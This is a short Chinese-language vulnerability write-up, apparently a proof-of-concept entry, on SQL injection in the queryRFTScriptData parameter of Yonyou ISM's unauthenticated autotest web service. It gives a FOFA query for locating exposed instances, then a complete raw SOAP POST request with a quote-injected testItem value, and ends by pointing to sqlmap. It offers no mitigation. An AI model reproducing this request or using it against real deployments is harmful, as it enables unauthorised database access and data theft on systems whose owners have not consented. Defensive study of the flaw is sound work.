用友ism queryRFTScriptData参数存在SQL注入漏洞
一、漏洞简介
用友ism存在wsdl未授权接口信息泄露,对wsdl进行解析xml,发现/uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService?wsdl接口中的queryRFTScriptData参数存在sql注入漏洞。
二、影响版本
- 用友ism
三、资产测绘
- fofa
app="用友-ism"
- 特征
四、漏洞复现
未授权接口
/uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService?wsdl
testItem参数存在sql注入
POST /uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=CD455D10BBE0F87FB8D6D6CEED880D58.server
Upgrade-Insecure-Requests: 1
SOAPAction: urn:queryRFTScriptData
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 739
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iaut="http://autotest.web.sdp.itf.nc/IAutoTestWebService">
<soapenv:Header/>
<soapenv:Body>
<iaut:queryRFTScriptData>
<queryInfo>
<!--type: string-->
<testItem>gero et'</testItem>
<!--type: string-->
<moduleName>sonoras imperio</moduleName>
<!--type: string-->
<versionCode>quae divum incedo</versionCode>
<!--type: string-->
<devfield>verrantque per auras</devfield>
<!--type: string-->
<testerCode>per auras</testerCode>
</queryInfo>
</iaut:queryRFTScriptData>
</soapenv:Body>
</soapenv:Envelope>
sqlmap